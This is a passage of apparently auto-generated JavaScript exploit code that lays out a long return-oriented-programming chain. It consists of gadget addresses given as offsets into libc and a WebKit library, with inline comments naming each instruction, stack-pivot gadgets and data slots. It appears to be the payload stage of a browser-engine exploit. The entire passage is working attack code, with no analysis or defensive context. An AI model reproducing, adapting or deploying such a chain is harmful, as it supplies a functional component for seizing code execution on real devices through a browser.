]); //L3012: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3013: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3015: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+187968, //L3016+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+187960, //L3016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3016: db([0, 0]); // 0x0 set_gadgets([ ropchain+187984, //L3016+24 ropchain+191512, //L3011 libc_base+764760, //pop rsi ropchain+188024, //L3017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3017: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3019: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+188144, //L3022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188128, //L3020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3020: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3022: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+188320, //L3025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+188336, //L3026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188288, //L3023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+188304, //L3024 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3023: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3024: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3025: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3026: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+188432, //L3028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+188416, //L3027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3027: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3028: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3029: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L3030: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+10973692, //imul rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+188616, //L3031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3031: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3033: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+188736, //L3036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188720, //L3034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx 
]); //L3034: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3036: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+188816, //L3037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+188832, //L3038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3037: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3038: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+188976, //L3041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188944, //L3039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+188960, //L3040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3039: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3040: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3041: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+189064, //L3043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3042: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3043: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+189152, //L3044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3044: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3046: db([16, 0]); // 0x10 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+189272, //L3049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189256, //L3047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3047: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3049: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+189360, //L3050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+189376, //L3052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L3050: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3052: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+189432, //L3053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3053: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+189624, //L3056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+189640, //L3057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189608, //L3055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3055: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3056: db([0, 
0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3057: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+189800, //L3061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189768, //L3059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+189784, //L3060 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3058: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3059: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3060: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3061: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+189856, //L3063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3063: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+189984, //L3065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190000, //L3066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+189968, //L3064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3064: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3065: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3066: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190160, //L3070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+190128, //L3068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
ropchain+190144, //L3069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3067: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3068: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3069: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3070: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+190216, //L3072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3072: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+190344, //L3074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190360, //L3075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190328, //L3073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3073: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3075: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190520, //L3079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+190488, //L3077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190504, //L3078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3076: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3077: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3078: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3079: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+190576, 
//L3081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3081: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+190704, //L3083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190720, //L3084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190688, //L3082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3082: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3083: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3084: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190816, //L3086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190800, //L3085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3085: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3086: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3087: db([48, 0]); // 0x30 set_gadget(libc_base+763368,); //pop rcx //L3088: db([48, 0]); // 0x30 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+191040, //L3090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191056, //L3091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+191024, //L3089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3089: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3090: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3091: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+191168, //L3092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191200, //L3094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+191184, //L3093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3092: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3093: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3094: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+191344, //L3097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+191328, //L3096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3095: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3096: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3097: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+191408, //L3098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3098: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3100: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi 
webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+191488, //L3102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3102: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+191528, //L3101 //L3011: libc_base+782311, //pop rsp ropchain+191544, //L3104 //L3101: libc_base+782311, //pop rsp ropchain+185640, //L2957 //L3104: libc_base+764760, //pop rsi ropchain+191584, //L3105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3105: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3107: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+191704, //L3110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+191688, //L3108 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3108: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3110: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+191880, //L3113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191896, //L3114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+191848, //L3111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+191864, //L3112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3111: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3112: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3113: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3114: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+192056, //L3118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+192024, //L3116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+192040, //L3117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3115: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3116: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3117: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3118: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+192176, //L3119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192208, //L3121 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+192192, //L3120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3119: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3120: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3121: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192312, //L3122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192328, //L3123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3122: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3123: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192448, //L3124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192432, //L3125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3125: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3124: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+192536, //L3127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+192520, //L3126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3126: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3127: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192640, //L3128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192656, //L3129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3128: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3129: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192776, //L3130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192760, //L3131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3131: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3130: db([0, 0]); // 0x0 //__out_rev: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); 
// 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192848, //L3133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3133: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+192912, //L3135 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3135: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3136: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3138: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+193080, //L3141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193064, //L3139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3139: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3141: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+193168, //L3142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+193184, //L3144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3142: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3144: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3145: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L3147: db([72, 0]); // 0x48 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+193344, //L3150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193328, //L3148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3148: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3150: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+193520, //L3153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+193536, //L3154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193488, //L3151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+193504, //L3152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3151: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3152: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3153: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3154: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+193632, //L3156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+193616, //L3155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3155: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3156: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3157: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, 
rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3158: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3159: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+193832, //L3161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3161: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+193888, //L3162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3162: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+194024, //L3166 webkit_base+660161, //mov [rsi], rax 